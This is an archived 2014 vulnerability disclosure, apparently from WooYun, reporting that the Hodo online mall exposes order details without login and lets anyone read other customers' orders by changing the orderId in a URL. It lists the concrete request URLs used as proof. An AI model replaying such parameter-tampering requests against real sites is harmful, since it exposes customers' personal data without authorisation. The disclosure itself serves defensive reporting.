漏洞详情

披露状态:

2014-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用户订购商品后,点击查看订单,相关连接的URL中嵌入了没经验证的另一段URL,该URL展示了用户的信息,导致漏洞产生。

详细说明:

在红豆商城注册一账号玩,随意选一商品,填单,确认订单后查看订单信息,其URL如下:

https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX%2BVEXYJDb5ICN8N5ebOfDqYAM9VLjrCb%2BL42et5s%3D&ddkey=http:AjaxLogonForm#https%3A%2F%2Fwww.hodo.cn%2Fmall%2FAjaxHistoryOrdersView%3FbreadCrumb%3DBrcmb%26currentSelection%3DOrderDetailSlct%26objectIdParam%3DorderId%26catalogId%3D10001%26langId%3D-7%26orderId%3D3720529%26storeId%3D10151%26orderStatusCode%3D%26identifier%3D1392122503362



看着眼花,遂转码。

sshot-1.png



https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362



可以看到,其中嵌入了一个地址:

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362



单独打开这一地址,可以看到订单的信息:

sshot-2.png



于是如果帐号未登录是否可查看订单信息呢?换其他浏览器打开,果然,是可以直接看到的。



果断更改参数,看看可有惊喜,发现更改上一段URL中的orderId参数值即可查看不同用户的信息。

orderId = 3720528(

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361

)的情形:

sshot-3.png



orderId = 3720518(

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361

的情形:

sshot-4.png

漏洞证明:

orderId = 3720528(

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361

)的情形:

sshot-3.png



orderId = 3720518(

https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb&currentSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720518&storeId=10151&orderStatusCode=&identifier=1392122503361

的情形:

sshot-4.png

修复方案:

加验证。。。

版权声明:转载请注明来源 Bx熊熊@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价: